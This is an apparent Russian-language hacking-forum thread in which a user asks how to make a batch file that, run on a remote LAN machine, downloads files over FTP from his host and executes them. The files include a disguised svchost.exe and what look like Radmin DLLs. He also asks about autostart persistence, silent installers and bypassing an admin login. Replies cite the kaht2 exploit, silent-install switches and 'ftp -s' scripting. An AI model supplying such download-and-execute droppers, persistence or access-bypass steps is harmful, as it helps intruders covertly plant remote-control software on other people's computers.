Всем привет .. давненько на античат не заглядывал , за это время много вопросов появилось ... 1) Я Решил поэксперементировать: проверить, можно ли с помощью обычного *.bat'ника и каманд сделать что то типо сервер-клиента в Lan, т.е. запустив его, на удаленный комп закачивались через ftp определенные файлы и там запускались. Но сделав *.bat'ник, и запустив у себя на компе ftp (RPC GUI v2 - r3L4x), он не хочет качать от меня файлы, вернее просто создает ярлыки... Вот что я прописал: start C:\WINDOWS\system32\cmd.exe>ftp open 192.168.10.ххх>asdf get 111.bat get 111.reg get AdmDll.dll get raddrv.dll get svchost.exe start svchost.exe start 111.bat start 111.reg>ok Поидеи, на удаленную машину должны закачаться эти файлы и запуститься... **Если прописывать каманды под cmd, то все закачивается как положено... Если возможно с помощью батника закачать файлы на удаленный комп, то что надо прописать в нем? 2) Если возможно так, то что надо прописать, что бы эти файлы закачались в автозагрузку? Плз. - не ставьте "-" за тему, думаю для новичков тоже будет интерессно, т.к. эта система будет работать и под XP SP2 ... 3) Есть ли программы-инсталяторы, которые извлекают файлы не видимо для пользователя? 4) Я имею удаленный доступ (по радмину) к компу, но зайти могу только по "Перепись файлов" и "камандной строке", а полный доступ не имею (не могу зайти на рабочий стол, т.к. стоит пароль админа на вход (ОС- XP SP1) ... как можно его обойти...?
Странно, ты запускаешь у себя сервер, и к себе же качаешь файлы... Этот бастник дожны запустить на удалённой машине. P.S надесь ты запускаешь tp (RPC GUI v2 - r3L4x) из папки с файлами? Да и вообще поставь нормальный FTP сервер и не парся со всякой хернёй.
1) в kaht2 есть свои сценарии, читай описание. 2) в sp2 уязвимость, используемая kaht-ом вылечена. 3) таких не знаю. ps. чисто имхо.
Многие популярные инсталляторы имеют возможность автоматической установки. Например, для Windows Installer'а нужно указать ключ /qn тогда инсталлятор скроет все окна и незаметно установит приложение. Для NSIS это ключ /S. Чтобы узнать аналогичный ключ у другого инсталятора запусти его с ключом /? или /help.
както тоже наподобе батник писал... чеб команды выполнялись надо писать ftp -s:comands.txt где comands.txt файл с ftp командами! а ваше смотри справку: 2) а про автозапуск можеш почитать ТУТ
Dr.Check, я имею ввиду если запустить на удаленной машине Батник... nc.STRIEM, можешь пожалуйста поподробнее ..... и работал ли он у тя (Bat'ник)